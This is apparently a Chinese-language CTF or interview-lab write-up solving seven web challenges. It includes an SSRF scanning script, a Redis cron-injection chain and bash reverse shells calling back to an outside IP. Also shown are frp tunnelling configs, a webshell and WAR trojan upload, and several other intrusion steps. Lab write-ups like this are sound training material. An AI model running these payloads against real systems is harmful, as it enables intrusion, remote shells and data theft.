二面过程记录文档

WEB1

FLAG1

先测试目标站点功能,发现并未对用户的输入进行过滤,可以发起任意的内网或者外网的请求,推测存在SSRF

外网:

内网:

使用 file 协议file:///flag读到根目录的flag

meetsec-web1{flag1-6d5e5c2bb397ba7727b58df59b35f66a}

FLAG2

再尝试获取存在 SSRF 漏洞的本机内网 IP 地址信息,内网网段是172.18.240.0/24

1
2
3
4
5
6
7
8
9
file:///etc/hosts 的快照如下:

127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.18.240.5	17b86b8e3c70

写一个python脚本,通过dict协议探测内网服务:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests

TARGET = "http://119.45.9.16"
HEADERS = {
    "Host": "119.45.9.16",
    "Cache-Control": "max-age=0",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Referer": "http://119.45.9.16/",
    "Connection": "keep-alive",
}
LAST_OCTETS = range(1, 256)
PORTS = [80, 443, 8080, 3306, 6379]

def fetch(url):
    try:
        return len(requests.post(TARGET, headers=HEADERS, data={"url": url}, timeout=5).content)
    except requests.RequestException:
        return 0

def main():
    baseline = fetch("dict://172.18.240.254:65535")
    print(f"基线响应长度:{baseline}\n开始探测...\n")
    results = [
        (length, f"172.18.240.{octet}", port)
        for octet in LAST_OCTETS
        for port in PORTS
        if (length := fetch(f"dict://172.18.240.{octet}:{port}") ) != baseline
    ]
    for length, ip, port in sorted(results, key=lambda x: x[0], reverse=True):
        print(f"[+] 内网服务可能存在: {ip}:{port}  响应长度 = {length}")
    print("\n探测完成。")

if __name__ == "__main__":
    main()

得到结果:

发现172.18.240.7:6379存在redis未授权

拿到flag

FLAG3

利用 Redis 的持久化机制,将命令写入定时任务,触发代码执行反弹shell

先清空现有数据,避免冲突

1
dict://172.18.240.7:6379/flushall

写入反弹 Shell 定时任务到 Redis

1
dict://172.18.240.7:6379/set x "\n* * * * * bash -i >& /dev/tcp/8.148.81.154/1234 0>&1\n"

修改持久化配置,将数据库文件写到 cron 目录

1
dict://172.18.240.7:6379/config set dir /var/spool/cron/
1
dict://172.18.240.7:6379/config set dbfilename root

触发持久化,将反弹命令写入定时任务文件 /var/spool/cron/root

1
dict://172.18.240.7:6379/save

在服务器监听对应端口,等待反弹的shell连接

1
nc -lvp 1234

拿到flag

meetsec-web1{flag3-f22eec9fb7c498b3a747392ff53a746b}

WEB2

FLAG1

Weblogic框架

存在漏洞

工具命令执行读取到flag

FLAG2

题目给出内网范围,猜测内网中还有其他主机存活,上传一个哥斯拉看看

上线

扫描内网172.25.20.0/24网段的服务

考虑frp内网穿透

先打一个反弹shell出来

1
/bin/bash -c "/bin/bash -i >& /dev/tcp/8.148.81.154/1234 0>&1"

在云服务器开启frp服务

1
./frps -c ./frps.toml

上传frpc与修改后的frpc.toml到靶机

1
2
3
4
5
6
7
8
9
serverAddr = "8.148.81.154"
serverPort = 7000

[[proxies]]
name = "test-tcp"
type = "tcp"
localIP = "172.25.20.12"
localPort = 3306
remotePort = 6666

进行frp穿透映射mysql服务

1
./frpc -c ./frpc.toml

想到Weblogic可以用jdbc做数据源连接,找到数据库的账户与加密的密码

/root/Oracle/Middleware/user_projects/domains/base_domain/security/路径拿到加密密钥dat文件

解密拿到数据库密码

连上数据库,拿到flag2

meetsec-web2{flag2-9fffac75c84bfc66fef4998f3574c6c8}

FLAG3

sqlmap连上os-shell拿到flag

meetsec-web2{flag3-2e947aef43be6dc428a9c626ba7fb824}

FLAG4

扫描内网172.16.10.0/24网段

frp穿透172.16.10.1的服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
serverAddr = "8.148.81.154"
serverPort = 7000

[[proxies]]
name = "test-tcp-1"
type = "tcp"
localIP = "172.16.10.1"
localPort = 8082
remotePort = 8082

[[proxies]]
name = "test-tcp-2"
type = "tcp"
localIP = "172.16.10.1"
localPort = 8081
remotePort = 8081

[[proxies]]
name = "test-tcp-3"
type = "tcp"
localIP = "172.16.10.1"
localPort = 80
remotePort = 80

[[proxies]]
name = "test-tcp-4"
type = "tcp"
localIP = "172.16.10.1"
localPort = 7001
remotePort = 7001

[[proxies]]
name = "test-tcp-5"
type = "tcp"
localIP = "172.16.10.1"
localPort = 6349
remotePort = 6349

[[proxies]]
name = "test-tcp-6"
type = "tcp"
localIP = "172.16.10.1"
localPort = 8848
remotePort = 8848

映射出来发现是Web1-7的其他题目

扫描内网172.26.30.0/24网段

frp穿透172.26.30.1的服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
serverAddr = "8.148.81.154"
serverPort = 7000

[[proxies]]
name = "test-tcp-1"
type = "tcp"
localIP = "172.26.30.1"
localPort = 80
remotePort = 80

[[proxies]]
name = "test-tcp-2"
type = "tcp"
localIP = "172.26.30.1"
localPort = 6379
remotePort = 6379

[[proxies]]
name = "test-tcp-3"
type = "tcp"
localIP = "172.26.30.1"
localPort = 7001
remotePort = 7001

[[proxies]]
name = "test-tcp-4"
type = "tcp"
localIP = "172.26.30.1"
localPort = 8081
remotePort = 8081

[[proxies]]
name = "test-tcp-5"
type = "tcp"
localIP = "172.26.30.1"
localPort = 8082
remotePort = 8082

[[proxies]]
name = "test-tcp-6"
type = "tcp"
localIP = "172.26.30.1"
localPort = 8848
remotePort = 8848

同样映射出来发现是Web1-7的其他题目

WEB3

FLAG1

SpringBoot框架

env环境变量中拿到第一个flag

FLAG2

mysql数据库

DirSearch扫到站点的/heapdump目录

JDumpSpider拿到数据库账号密码

连上数据库拿到flag

meetsec-web3{flag2-9edbd4b03b5f86a9abe079bc63ea847b}

WEB4

FLAG1

BEESCMS框架

扫描路径

发现有登录页面

存在sql注入,调用 updatexml() 函数触发 XPath 解析错误泄露出数据库中的用户名和密码

查询密码哈希值

存在文件上传:http://119.45.9.16:8082/admin/upload.php,改Content-Type为image/png绕过

蚁剑连上:http://119.45.9.16:8082/upload/img/202508152019431476.php 拿到flag

meetsec-web4{flag1-476e2dceb225678cd466fc3cd2b4c59c}

WEB5

FLAG1

Apache Tomcat站点

存在Tomcat Manager登录页面,抓包看到请求头的Authorization字段是由 Username:Password 再进行Base64编码得到

在Intruder模块自定义payload的迭代器,第一个位置为Username,第二个位置为 : 符号,第三个位置为Password,最后Base64编码

爆破得到正确的 Username:Password 编码

Cyberchef解码得到账号密码

登录到后台

有一个部署war的文件上传点

生成jsp木马

压缩为zip格式,改后缀为war,上传到站点部署

连接shell

拿到flag

meetsec-web5{flag1-c7a8d2734ec5a4ed687a9a692ee733f8}

WEB6

FLAG1

nmap探测指纹,确定是redis服务

工具rce

meetsec-web6{flag1-672728e3bde3f4cc2b59de572b4df6d6}

WEB7

FLAG1

第一个地址119.45.9.16:8848,指纹是Nacos

访问/nacos路径,默认账号密码登录

访问第二个地址看看

shiro框架

回到第一个地址,发现泄露了Shiro key

工具rce命令执行

meetsec-web7{flag1-97fde43b8e55cb2e2b26b7c232ea82fa}